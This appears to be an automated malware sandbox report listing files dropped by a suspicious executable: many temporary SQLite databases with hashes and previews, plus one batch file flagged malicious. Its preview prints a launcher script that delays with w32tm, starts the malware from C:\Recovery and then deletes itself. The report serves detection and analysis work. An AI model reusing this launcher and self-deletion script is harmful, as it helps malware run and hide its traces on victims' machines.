MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HvRIOOIFXU

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IQqX3pBsdf

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IfF0B9JxZf

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Iw85bVnJ7c

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\J0pr8GQ0Qq

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JJnLHnWisM

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JLdTjPOnmX

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JLtokMz9wW

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JhV1zZWLhT

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\K9YY1i7Sq5

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kn67jaSJWl

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kt4TVt7RWL

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\L1CEUyMh88

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LLncB2m0Do

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LOKNQWuSxN

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LRhkeZbq76

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LZb2FwNndp

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\M1m0fKslZI

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\M3zo5TuWuu

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MMbFAjg8y0

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\N42z5LzeLt

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NlUvDDnp0X

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OBaOT5M27o

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.311623002360796
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7tUfPNbKOZG1wkn23fxAKDoRH:HTg9uYDE7SfhfZAKDMH
MD5:	40A416783A088FD5936DAD8A3B2A3166
SHA1:	50023ECDB77EEAC34997227193DEDA4E6BDAD1D7
SHA-256:	EF9491BFCF63CF34F6AB84FE5FBC95DD89427342D2655DE15CE8DA6645B14F05
SHA-512:	9B3CD8E9FC5A5C1031A8B87D3E8FFBE76282FB19AB79593F9F9F9BA58274E9957511258AD2942195783FEC07A7846E2F70703A3524551A0587AFD0CECF72EF1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OQZC6ToBZn.bat"

C:\Users\user\AppData\Local\Temp\ORNJhtdS1O

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Oh8jpaguqa

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
